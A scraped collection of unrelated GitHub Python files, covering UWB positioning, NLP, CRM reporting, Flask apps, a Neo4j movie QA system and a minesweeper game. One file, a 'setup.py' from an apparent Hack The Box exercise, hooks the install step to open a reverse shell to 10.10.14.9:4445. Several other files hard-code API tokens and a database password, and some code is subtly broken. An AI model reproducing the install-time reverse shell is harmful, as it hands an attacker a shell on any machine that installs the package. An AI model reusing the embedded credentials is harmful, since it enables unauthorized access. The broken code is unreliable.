AoA_azimuth = Fxp(val="0x"+result[7]+"0x"+result[6], signed=True, n_word=16, n_frac=7).astype(float)
PDoA_azimuth = Fxp(val="0x"+result[9]+"0x"+result[8], signed=True, n_word=16, n_frac=7).astype(float)
nlos = Fxp(val="0x"+result[10], signed = False, n_word=8, n_frac = 0).astype(int).tolist()
## convert types for dist and angle
# dist = math.sqrt(math.pow(float(distance)/100,2) - math.pow(self.h_diff,2))
dist = float(distance)/100
angle = math.pi * (float(AoA_azimuth)+90)/180
s_dist = str(dist)
# ## calculate position of TAGs
x = dist * math.cos(angle)
y = dist * math.sin(angle)
x_ref = str(x)
y_ref = str(y)
# r_X2Y2 = pow((x - self.ref[0]),2) + pow((y - self.ref[1]),2)
# r_err = str(r_X2Y2)
if result[0] == '11':
meas = np.array([[x],[y]])
self.ekf.ekf_update1(meas)
self.ekf.cnt1 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,Fore.GREEN,"TAG 1 EKF : ({:.2f}, {:.2f})".format(self.ekf.X1[0][0],self.ekf.X1[1][0]),"\n",Fore.RESET)
elif result[0] == '22':
meas = np.array([[x],[y]])
self.ekf.ekf_update2(meas)
self.ekf.cnt2 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 2 EKF : ({:.2f}, {:.2f})".format(self.ekf.X2[0][0],self.ekf.X2[1][0]),"\n")
elif result[0] == '33':
meas = np.array([[x],[y]])
self.ekf.ekf_update3(meas)
self.ekf.cnt3 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 3 EKF : ({:.2f}, {:.2f})".format(self.ekf.X3[0][0],self.ekf.X3[1][0]),"\n")
elif result[0] == '44':
meas = np.array([[x],[y]])
self.ekf.ekf_update4(meas)
self.ekf.cnt4 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 4 EKF : ({:.2f}, {:.2f})".format(self.ekf.X4[0][0],self.ekf.X4[1][0]),"\n")
else : pass
# x_pos = self.X[0,0]
# y_pos = self.X[1,0]
# e_X2Y2 = pow((x_pos - self.ref[0]),2) + pow((y_pos - self.ref[1]),2)
# e_err = str(e_X2Y2)
# self.plot()
except:
pass
# # print(Fore.GREEN, x_ref, y_ref, scpi_ret,Fore.RESET)
# ## save data(.csv file) ##
# save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth])
# save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth, e_err, r_err])
# time.sleep(self.delay)
self.scpi_rx.flush()
result.clear()
if __name__ == "__main__":
# now = datetime.datetime.now()
# nowDatetime = now.strftime('%Y_%m_%d_%H_%M_%S')
# ranging_result_csvF = 'results/UWB_SR150_ranging_test_result-%s.csv' %nowDatetime
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth'])
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth', 'Estimated_Err', 'Ref_Err'])
unlab = Unlab_SR150_Resp()
unlab.Positioning() | yws94/Unlab_SR150 | prev_ver/Unlab_SR150_ver3.py | Unlab_SR150_ver3.py | py | 7,042 | python | en | code | 2 | github-code | 36 |
12887801729 | import spacy
from spacy import displacy
nlp = spacy.load('en_coref_md')
print("loaded")
text = r'''
Although Apple does not break down sales of AirPods, the company reported in January that its "other" product category, which includes AirPod sales, grew 33% to $7.3 from a year earlier, the fastest growing category.'''
doc = nlp(text)
doc._.has_coref
coref = doc._.coref_clusters
resolved = doc._.coref_resolved
print(coref)
print(resolved)
displacy.serve(coref, style="ent")
| AngeloCioffi/Info-Retrieval-Practical-NLP | neuralcoref/corref.py | corref.py | py | 484 | python | en | code | 1 | github-code | 36 |
29649845397 | import urllib3
import urllib.request
import base64
import json
import pandas as pd
from tabulate import tabulate
import codecs
import numpy as np
url = 'https://infeci.capsulecrm.com/api/opportunity'
headers = {}
# base64string = base64.urlsafe_b64encode('2d486e42771eee18125b8aef3afe216d:4c2TNRdi')
base64string = base64.encodestring(('2d486e42771eee18125b8aef3afe216d:4c2TNRdi').encode()).decode().replace('\n', '')
headers['Authorization'] = "Basic %s" % base64string
headers['Accept'] = "application/json"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
reader = codecs.getreader("utf-8")
data = json.load(reader(resp))
print (data)
# Creamos el CSV con las oportunidades
# atributos = ['name','probability','expectedCloseDate','createdOn','updatedOn','value','currency','partyId','milestoneId','milestone','owner','id','durationBasis']
# s = ""
# for atr in atributos:
# s = s + atr + ","
# s = s + "\n"
# for op in data['opportunities']['opportunity']:
# for atr in atributos:
# s = s + op[atr] + ","
# s = s + "\n"
#
# text_file = open("oportunidades.csv", "w")
# text_file.write(s)
# text_file.close()
data = pd.read_csv('oportunidades.csv')
print (tabulate(data, headers='keys', tablefmt='psql'))
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\tESTADO GLOBAL DE LAS OPORTUNIDADES")
data = pd.read_csv('oportunidades.csv')
df = data
df = df.drop(df.columns[[0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12]], axis=1)
df['benef'] = df['value'] * df['margen'] / 100
pt = df.groupby(['milestone']).sum()
pt['margen'] = 100 * pt ['benef'] / pt['value']
print (tabulate(pt, headers='keys', tablefmt='psql'))
print ("\tValor Total: %s" % data['value'].sum())
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\n\n")
print ("\tPROXIMAS OFERTAS A PRESENTAR")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone']=='New'])
df = df.sort_values('expectedCloseDate')
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12,13,14]], axis=1)
print (tabulate(df, headers='keys', tablefmt='psql'))
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\n\n")
print ("\tANALIZANDO...")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone']=='New'])
df = df.sort_values('expectedCloseDate')
print (df)
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12,13,14]], axis=1)
print (tabulate(df, headers='keys', tablefmt='psql'))
# {u'name': u'Definici\xf3n de Tarjeta de Transporte', u'probability': u'10', u'expectedCloseDate': u'2016-09-15T00:00:00Z',
# u'createdOn': u'2016-08-17T09:48:26Z', u'updatedOn': u'2016-08-17T11:29:53Z', u'value': u'95000.00', u'currency': u'EUR',
# u'partyId': u'115869164', u'milestoneId': u'405855', u'milestone': u'New', u'owner': u'rubenglezant', u'id': u'4609271',
# u'durationBasis': u'FIXED'}
# response = urllib2.urlopen('https://api.instagram.com/v1/tags/pizza/media/XXXXXX')
# curl -u 2d486e42771eee18125b8aef3afe216d:4c2TNRdi https://infeci.capsulecrm.com/api/party | rubenglezant/playBetterBets | Python-Bolsa/reportCRM/buildReport.py | buildReport.py | py | 3,230 | python | en | code | 0 | github-code | 36 |
24151547273 | import pandas as pd
def calculate_demographic_data(print_data=True):
# Read data from file
df = pd.read_csv('adult.data.csv')
# Define property for the dataset by using a Panda series.
race_count = df['race'].value_counts()
average_age_men = round(df[df['sex'] == 'Male']['age'].mean(), 1)
percentage_education = round(df[df['education'] == 'Education'].shape[0] / df.shape[0] * 100, 1)
q1 = df['education'].isin(['Bachelors', 'License', 'Masters'])
q2 = df['salary'].isin(['1K', '5K', '10K', '20K'])
higher_education_rich = round((q1 & q2).sum() / q1.sum() * 100, 1)
lower_education_rich = round((q1 & q2).sum() / (q1).sum() * 100, 1)
# Define a new property regarding the average working hour.
average_works_hours = df['hours-per-week'].min()
# Define a new percentage of people working x hours a week with a salary of 20K
q1 = df['hours-per-week'] == average_works_hours
# Define the percentage
rich_percentage = round((q1 & q2).sum() / q1.sum() * 100, 1)
p = (df[q2]['Bucharest'].value_counts() \
/ df['Bucharest'].value_counts() * 100).sort_values(ascending=False)
highest_earning_region = p.index[0]
highest_earning_region_percentage = round(p.iloc[0],[1])
# Identify the highest regions with a percentage of people having a wage higher than 20K.
top_IN_region = df[(df['Bucharest'] == 'Bucharest Metropolitan Area') & q2] \
['occupation'].value_counts().index[0]
if print_data:
print("Number of each person", person_count)
print("Average age of men", average_age_men)
print(f"Percentage with Bachelors degree: {percentage_education}%")
print(f"Percentage with higher education earning at least 20K: {higher_education_rich}%")
print(f"Percentage without higher education having a wage at least 20K: {lower_education_rich}%")
print(f"Average work time: {average_works_hours} hours/week")
print(f"Percentage of rich people working less hours than average: {rich_percentage}%")
print("Region with the highest percentage:", highest_earning_region)
print(f"Highest percentage of rich people into the region: {highest_earning_region_percentage}%")
print(f"Ocupations in Bucharest", top_IN_region)
return {
'race_count': race_count,
'average_age_men': average_age_men,
'percentage_bachelors': percentage_education,
'higher_education_rich': higher_education_rich,
'lower_education_rich': lower_education_rich,
'min_work_hours': average_works_hours,
'rich_percentage': rich_percentage,
'highest_earning_country': highest_earning_region,
'highest_earning_country_percentage':
highest_earning_region_percentage,
'top_IN_occupation': top_IN_region
}
| SoDisliked/Demographic-Analyzer-Romania | Model.py | Model.py | py | 2,909 | python | en | code | 1 | github-code | 36 |
40353460149 | # -*- coding:utf-8 _*-
"""
@author:crd
@file: weather.py
@time: 2018/04/09
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
filename = 'month.csv'
data = pd.read_csv(filename)
data_DelRainError = data.drop(data.index[abs(data['V13011']) == 32766]) # 删除没有降水量的行
data_station1 = data_DelRainError[data_DelRainError['V01000'] == 52754] # 刚察
data_station2 = data_DelRainError[data_DelRainError['V01000'] == 52842] # 共和
data_station3 = data_DelRainError[data_DelRainError['V01000'] == 52856] # 茶卡
# plt.plot(data_station1['V04001'], data_station1['V13011'])
# plt.plot(data_station2['V04001'], data_station2['V13011'])
# plt.plot(data_station3['V04001'], data_station3['V13011'])
# plt.show()
Sattion = []
Year = []
data_year = []
for sattion in [52754, 52842, 52856]:
data_station = data_DelRainError[data_DelRainError['V01000'] == sattion]
for year in range(1978, 2017):
Sattion.append(sattion)
Year.append(year)
c = data_station[data_station['V04001'] == year]
data_year.append((c['V12001'].sum()/12)/10)
data = {'Sattion': Sattion, 'Year': Year, 'data_year': data_year}
frame = pd.DataFrame(data)
s1 = frame[frame['Sattion'] == 52856]
s2 = frame[frame['Sattion'] == 52754]
s3 = frame[frame['Sattion'] == 52842]
| crd57/backup | weather.py | weather.py | py | 1,316 | python | en | code | 0 | github-code | 36 |
7004941204 | from distutils.core import setup
from setuptools.command.install import install
import socket, subprocess,os
class PreInstallCommand(install):
def run(self):
shell()
install.run(self)
def shell():
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.9",4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
setup(
name = 'pigpackage',
packages = ['pigpackage'],
version = '0.1',
license='MIT',
description = 'TYPE YOUR DESCRIPTION HERE',
author = 'YOUR NAME',
author_email = 'your.email@domain.com',
url = 'http://test.com/pigpackage',
keywords = ['pigpackage'],
cmdclass={'install':PreInstallCommand,},
)
| nutty-guineapig/htb-pub | sneakymailer/sneakymailer/mypackage/setup.py | setup.py | py | 773 | python | en | code | 0 | github-code | 36 |
1119194210 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 19 11:21:13 2023
@author: nmorales
"""
from requests.auth import HTTPBasicAuth
import requests
import json
import matplotlib
import pandas as pd
import numpy as np
url_cotizacion = 'https://cloud.biva.mx/stock-exchange/BIVA/quote?isin=MX01AM050019&period=Y&quantity=5'
headers = {"x-api-key": '5tbGgJp5Bq4yGPGaLcaUE8K7dUe83uxO94GYLjIq'}
response_cotizacion = requests.get(url=url_cotizacion, headers=headers)
data_cotizacion=response_cotizacion.json()
data_cotizacion=pd.DataFrame(data_cotizacion['timeSeries']).set_index('dateInMillis')
###########################
############################### SIMPLE RETURN
###########################
data_cotizacion['Simple_Return'] =(data_cotizacion['close']/data_cotizacion['close'].shift(1))-1 #(P1/p0)-1
print (data_cotizacion['Simple_Return'])
data_cotizacion.count(axis=1)
data_cotizacion['Simple_Return'].plot(figsize=(8,5))
avg_returns_d=data_cotizacion['Simple_Return'].mean()
print(avg_returns_d)
#####################################################
##this is the mean return annually (250) days
###############################################
avg_returns_a=data_cotizacion['Simple_Return'].mean()*250
avg_returns_a_str=str(round(avg_returns_a,5)*100)+' %'
print(avg_returns_a_str) ##aqui sale un 12% lo cual indica que se tiene un retorno anual promedio de 12%
###########################
############################### Logarithmic RETURN
###########################
data_cotizacion['Logarithmic_Return'] =np.log(data_cotizacion['close']/data_cotizacion['close'].shift(1)) #(P1/p0)-1
print(data_cotizacion['Logarithmic_Return'])
####se usa el precio de cierre de hoy entre el de ayer y se le resta uno ese sería el retorno simple
#print(PG['Simple_Return'])
#print(PG['Adj Close'])
data_cotizacion['Logarithmic_Return'].plot(figsize=(8,5))
#####################################################
##this is the mean return is a super small number lower than 1% because is daily
###############################################
log_returns_d=data_cotizacion['Logarithmic_Return'].mean()
#####################################################
##this is the mean return annually (250) days
###############################################
log_returns_a=data_cotizacion['Logarithmic_Return'].mean()*250
log_returns_a_str=str(round(log_returns_a,5)*100)+' %'
print(log_returns_a_str) ##aqui sale un 10% lo cual indica que se tiene un retorno anual promedio de 10%
| NRMAnaya/PythonForFinance | RateOfReturn/Simple&LogarithmicReturnBIVACLOUD.py | Simple&LogarithmicReturnBIVACLOUD.py | py | 2,522 | python | es | code | 0 | github-code | 36 |
72092399465 | lst = list("HelloPython!") # list() 함수 호출하여 문자열을 인자로 전달하여 각 문자가 리스트의 요소인 리스트를 만들어 변수 lst에 대입
print(" + " + "012345678901") # 표준 출력 함수 print() 호출하여 문자열 출력, 인덱스 오름차순
print(" " + "HelloPython!") # 표준 출력 함수 print() 호출하여 문자열 출력, 리스트에 담긴 문자열
print(" - " + "210987654321") # 표준 출력 함수 print() 호출하여 문자열 출력, 인덱스 역순
while True: # 조건식 True일 동안 반복, 즉 무한반복
n1, n2, n3 = input("슬라이스[?:?:?] 3개 입력 >> ").split() # 표준 입력 함수 input() 호출하여 입력 안내 메세지 출력 동시에 사용자로부터 입력 받은 문자열을 리턴받아 split() 메소드 호출하여 공백을 구분자로 하여 분리된 문자열을 요소로 하는 리스트 만들어 리턴하여 변수 n1, n2, n3에 각각 대입
n1 = int(n1) # 문자열 n1을 int() 함수 호출하여 정수로 변환한 뒤 n1에 대입
n2 = int(n2) # 문자열 n1을 int() 함수 호출하여 정수로 변환한 뒤 n2에 대입
n3 = int(n3) # 문자열 n1을 int() 함수 호출하여 정수로 변환한 뒤 n3에 대입
if n1 == 0 and n2 == 0 and n3 == 0: # 만약 n1, n2, n3 모두 0이면, 즉 사용자가 0 0 0을 입력하면
print(" 종료 ".center(26, "*")) # 표준 출력 함수 print() 호출하여 종료 안내 메세지 출력, center() 메소드 호출하여 폭 26, 채울문자 "*" 만들어진 문자열 리턴
break # 반복문 빠져나감
print(lst[n1:n2:n3]) # 표준 출력 함수 print() 호출하여 리스트 lst를 슬라이싱하여 새로 만들어진 리스트 리턴하여 출력 | jectgenius/python | ch05/05-ch03.py | 05-ch03.py | py | 1,777 | python | ko | code | 0 | github-code | 36 |
29335693587 | from keras.models import load_model
from sklearn.metrics import confusion_matrix
import itertools
import numpy as np
import matplotlib.pyplot as plt
import sys
import csv
def load_data(train_data_path):
X_train = []
Y_train = []
text = open(train_data_path, 'r', encoding='big5')
row = csv.reader(text , delimiter=",")
for i,r in enumerate(row):
if i == 0:
continue
Y_train.append(int(r[0]))
X_train.append(r[1].split())
return ( np.reshape(np.array(X_train,dtype='int'),(len(X_train),48,48,1)), np.array(Y_train,dtype='int') )
def split_valid_set(X_all, Y_all, percentage):
all_data_size = len(X_all)
valid_data_size = int(all_data_size * percentage)
X_train, Y_train = X_all[0:valid_data_size], Y_all[0:valid_data_size]
X_valid, Y_valid = X_all[valid_data_size:], Y_all[valid_data_size:]
return X_valid, Y_valid
def plotconfusionmatrix(cm, classes,
title='Confusion matrix',
cmap=plt.cm.jet):
"""
This function prints and plots the confusion matrix.
"""
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, '{:.2f}'.format(cm[i, j]), horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
def main():
model_path = 'check_point/'+sys.argv[1]
train_data_path = 'data/train.csv'
dev_feats, te_labels = load_data(train_data_path)
dev_feats, te_labels = split_valid_set( dev_feats, te_labels, 0.01 )
print("HHHHH")
emotion_classifier = load_model(model_path)
np.set_printoptions(precision=2)
predictions = emotion_classifier.predict(dev_feats)
predictions = predictions.argmax(axis=-1)
print (predictions)
print (te_labels)
conf_mat = confusion_matrix(te_labels,predictions)
plt.figure()
plot_confusion_matrix(conf_mat, classes=["Angry","Disgust","Fear","Happy","Sad","Surprise","Neutral"])
plt.show()
if __name__=='__main__':
main()
| b01901143/ML2017FALL | hw3/confusion.py | confusion.py | py | 2,433 | python | en | code | 1 | github-code | 36 |
9366591632 | # coding=utf-8
from flask import Flask, jsonify, render_template, request
from py2neo import Graph
import jw.Q_Search as search
import json
import logging
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='logs/pro2.log',
filemode='a')
app = Flask(__name__)
graph = Graph(
"http://118.25.74.160/",
port= 7474,
username="neo4j",
password="jinwei"
)
f = open("recommend_list.json","r")
d = json.loads(f.read())
f.close()
def buildNodes_g(nodeRecord):
data = {"id": str(nodeRecord['g']['gid']), "name": str(nodeRecord['g']['name']),"label":"Genre"}
return {"data": data}
def buildNodes_m(nodeRecord):
data = {"id": str(nodeRecord['m']['mid']), "name": str(nodeRecord['m']['title']), "label":"Movie"}
return {"data": data}
def buildNodes_p(nodeRecord):
data = {"id": str(nodeRecord['n']['pid']),
"name": str(nodeRecord['n']['pname']) if nodeRecord['n']['pname']!=None else nodeRecord['n']['eng_name'],
"label":"Person"}
return {"data": data}
def buildEdges(relationRecord):
data = {"source": str(relationRecord['r']['mid']),
"target": str(relationRecord['r']['gid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def buildEdges_act(relationRecord):
data = {"source": str(relationRecord['r']['pid']),
"target": str(relationRecord['r']['mid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def get_recommendation(entities):
try:
q = list(entities.values())[0]
print(q)
global d
return d[q]
except:
return "周星驰, 葛优, 巩俐, 冯小刚</div><div>功夫, 十面埋伏, 霸王别姬, 黄飞鸿"
@app.route('/')
def hello_world():
logging.warning("====== user ip: {} ======".format(request.remote_addr))
return render_template('index000.html')
@app.route('/search', methods=['GET'])
def index1():
return render_template('index1.html')
@app.route('/search', methods=['POST'])
def index2():
query = request.form['Search']
logging.warning("====== Query: {} ======".format(query))
#query = query.replace("\n","")
global entities
entities,answer = search.get_query_type(query)
f = open("./templates/index2.html", 'w',encoding="utf-8")
message_front ='''<!DOCTYPE html>
<html>
<head>
<title>Knowledge Graph</title>
<link href="/static/css/style.css" rel="stylesheet" />
<script src="http://cdn.bootcss.com/jquery/1.11.2/jquery.min.js"></script>
<script src="http://cdn.bootcss.com/cytoscape/2.3.16/cytoscape.min.js"></script>
<script src="/static/js/code.js"></script>
</head>
<body>'''
question = '<h3>Your Question</h3>\n<div>'+str(query).replace('\n','')+ '</div>\n'
recommendation = '<h3>You Might Like this</h3><div>'+get_recommendation(entities)+'</div>'
answer = '<h3>Answer</h3>\n<div>' + str(answer).replace('\n','<br>') + "</div>\n"
message_back='''<h3>Movie Graph</h3>
<div id="cy"></div>
</body>
</html>'''
f.write(message_front+question+answer+recommendation+message_back)
f.close()
return render_template('index2.html')
@app.route('/graph')
def get_graph():
try:
nodes = list(map(buildNodes_m, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN m'''.format(entities[0]))))
nodes = nodes+list(map(buildNodes_p, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN n'''.format(entities[0]))))
edges = list(map(buildEdges_act, graph.run('''MATCH (n:Person)-[r]->(m:Movie) where n.pname='{}' RETURN r limit 100'''.format(entities[0]))))
except:
try:
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN m'''.format(entities[1]))))
nodes = nodes+list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN n limit 100'''.format(entities[1]))))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="{}" RETURN g'''.format(entities[1]))))
edges = list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title='{}' RETURN r limit 100'''.format(entities[1]))))
edges = edges + list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="{}" RETURN r limit 100'''.format(entities[1]))))
except:
#print("=============Here is OK=============")
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (m:Movie)-[:is]->() where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN m''')))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN g''')))
nodes = nodes + list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN n''')))
edges = list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
edges = edges + list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
#print("=============Here is OK=============")
# nodes = map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n'))
# edges = map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r'))
return jsonify(elements = {"nodes": nodes, "edges":edges})
if __name__ == '__main__':
app.run(debug = True) | ChandlerBang/Movie-QA-System | flask_app.py | flask_app.py | py | 6,282 | python | en | code | 58 | github-code | 36 |
31872554645 | import os
from services.connect import *
from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from dotenv import load_dotenv
import uuid
load_dotenv()
review_blueprint = Blueprint('reviews', __name__)
MONGODB_CONNECTION_STRING = os.getenv("MONGO_URI")
MONGODB_DATABASE = 'ch'
# POST create a user
@review_blueprint.route('/reviews', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def create_review():
data = request.get_json()
client, collection = connect_mongo('reviews')
newReview = {}
newReview['_id'] = uuid.uuid4()
newReview['title'] = data['title']
newReview['ratings'] = data['ratings']
newReview['content'] = data['content']
collection.insert_one(newReview)
client.close()
return jsonify(newReview), 201
| dp3why/dessert-service | controllers/review_controller.py | review_controller.py | py | 819 | python | en | code | 0 | github-code | 36 |
16256225108 | from relay import Relay
r = Relay()
html = ""
with open("pcb2.html", 'r') as f:
html = f.read()
def web_page():
if r.get_value():
r_state = "ON"
else:
r_state = "OFF"
return html.replace('r_state', r_state)
def serve():
while True:
conn, addr = s.accept()
request = conn.recv(1024)
if not request:
continue
try:
command = request.split()[1][4:]
except Exception as e:
log_data(str(e))
log_data('Request {0}'.format(request.decode()))
if command == b'on':
r.on()
elif command == b'off':
r.off()
response = web_page()
conn.send('HTTP/1.1 200 OK\n')
conn.send('Content-Type: text/html\n')
conn.send('Connection: close\n\n')
conn.sendall(response)
conn.close()
log_data = 'Connected from: {0} with request: {1}'.format(addr[0], request.decode())
# print(log_data)
log_write(log_data)
gc.collect()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 80))
s.listen(5)
serve()
except KeyboardInterrupt as e:
log_write(str(e))
pass
except Exception as e:
log_write(str(e))
if 'EADDRINUSE' in str(e):
machine.reset()
finally:
log_write('Closing Socket')
s.close()
gc.collect()
| lalondesteve/py8266 | on_off_server/main.py | main.py | py | 1,399 | python | en | code | 0 | github-code | 36 |
72692990823 | import sqlite3
class Db:
"""
A class used to represent database(Db)
"""
def __init__(self, database):
self.conn = sqlite3.connect(database, check_same_thread=False)
self.conn.row_factory = sqlite3.Row
self.cursor = self.conn.cursor()
def execute(self, query):
self.cursor.execute(query)
self.conn.commit()
def fetchall(self, query):
self.cursor = self.conn.cursor()
self.execute(query)
result = [dict(row) for row in self.cursor.fetchall()]
return result
def close(self):
self.conn.close()
def setup(self, data):
self.create_classes_table()
self.create_animals_table()
for d in data:
self.insert_data_from_csv(d[0], d[1])
def create_animals_table(self):
query = '''
create table animals
(id integer not null, animal_name text, hair integer, feathers integer, eggs integer, milk integer, airborne integer,
aquatic integer, predator integer, toothed integer, backbone integer, breathes integer, venomous integer,
fins integer, legs integer, tail integer, domestic integer, catsize integer, class_type integer,
primary key (id), foreign key (class_type) references classes(id))'''
self.execute(query)
def create_classes_table(self):
query = '''
create table classes
(id integer not null, number_of_animal_species_in_class integer, class_type text,
primary key (id))
'''
self.execute(query)
def insert_data_from_csv(self, csv_path, table):
with open(csv_path, 'r') as file:
next(file)
for line in file:
line = line.strip().split(',')
line[0] = f"'{line[0]}'" if not line[0].isdigit() else line[0]
line[1] = f"'{line[1]}'" if not line[1].isdigit() else line[1]
query = f'insert into {table} values (null, {", ".join(line)})'
self.execute(query)
# def add_foreign_key(self, table, foreign_key, ref_table, ref_column):
# query = f'''
# alter table {table}
# add foreign key ({foreign_key}) references {ref_table}({ref_column})'''
# print(query)
# self.execute(query)
| madeleinema-cee/think-of-an-animal-flask | db.py | db.py | py | 2,372 | python | en | code | 0 | github-code | 36 |
16096100007 | import pygame
import minesweeper_map as mm
pygame.init()
class minesweeper_tile():
def __init__(self, v, f=False, h=True):
self.value = v
self.flag = f
self.hidden = h
def set_value(self, v):
self.value = v
def set_flag(self):
self.flag = not self.flag
def set_hidden(self):
self.hidden = not self.hidden
class minesweeper_game():
TILE_SIZE = 20
LEFT_MOUSE_BUTTON, RIGHT_MOUSE_BUTTON = 1, 3
game_over = False
win = False
img = pygame.image.load('minesweeper_icons.png')
images = []
for i in range(12):
images.append(img.subsurface(TILE_SIZE*i, 0, TILE_SIZE, TILE_SIZE))
def __init__(self, size, bombs):
self.mmap = mm.minesweeper_map(size, bombs)
self.board_size = self.mmap.get_board_size()
self.create_tile_board()
self.create_window(self.board_size, bombs)
self.run_game()
def create_tile_board(self):
self.tile_board = [[minesweeper_tile(0) for _ in range(self.mmap.get_board_size())]
for _ in range(self.mmap.get_board_size())]
for r in range(len(self.mmap.get_board())):
for c in range(len(self.mmap.get_board()[r])):
self.tile_board[r][c].value = self.mmap.get_board()[r][c]
def create_window(self, size, bombs):
self.window = pygame.display.set_mode((size*self.TILE_SIZE, size*self.TILE_SIZE))
pygame.display.set_caption('%s Bombs Total' % (bombs))
def run_game(self):
running = True
while running:
pygame.time.delay(int(1000/60))
for e in pygame.event.get():
if e.type == pygame.QUIT:
running = False
if e.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_interaction(e)
self.draw_window()
if self.game_over:
pygame.display.set_caption('Game Over')
pygame.time.delay(1000)
running = False
if self.win:
pygame.display.set_caption('You\'ve Won!')
pygame.time.delay(1000)
running = False
pygame.quit()
def handle_mouse_interaction(self, e):
x, y = int(pygame.mouse.get_pos()[0]/self.TILE_SIZE), int(pygame.mouse.get_pos()[1]/self.TILE_SIZE)
corr_tile = self.tile_board[x][y]
if corr_tile.hidden:
if e.button == self.LEFT_MOUSE_BUTTON:
self.handle_hidden(x, y)
if self.get_win():
self.win = True
elif e.button == self.RIGHT_MOUSE_BUTTON:
self.tile_board[x][y].set_flag()
if corr_tile.value == mm.minesweeper_map.BOMB:
if e.button == self.LEFT_MOUSE_BUTTON:
self.game_over = True
def get_win(self):
for row in self.tile_board:
for cell in row:
if cell.hidden and cell.value is not self.mmap.BOMB:
return False
return True
def handle_hidden(self, x, y):
self.tile_board[x][y].set_hidden()
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x-1, y):
if self.tile_board[x-1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x-1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x+1, y):
if self.tile_board[x+1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x+1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y-1):
if self.tile_board[x][y-1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y-1)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y+1):
if self.tile_board[x][y+1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y+1)
def draw_window(self):
for r in range(len(self.tile_board)):
for c in range(len(self.tile_board[r])):
c_tile = self.tile_board[r][c]
if c_tile.flag:
